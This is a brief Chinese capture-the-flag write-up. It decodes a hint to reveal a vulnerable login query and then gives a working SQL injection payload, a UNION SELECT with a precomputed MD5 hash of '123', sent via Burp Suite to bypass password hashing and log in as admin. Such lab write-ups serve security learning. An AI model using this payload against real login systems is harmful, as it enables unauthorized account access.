从这条信息可以知道这是base32码,解码得到一个base64码
解码得到一个:
select * from user where username = '".$name."'
不能得到有用的信息但通过题目源码得知password被md5加密了
所以得找个办法绕过加密。构建一个payload虚拟身份绕过审核机制。
通过burp suite 并构建一个name=1' union select 1,'admin','.......'#pw=123
'......'就是123的md5值为202CB962AC59075B964B07152D234B70
flag就出来了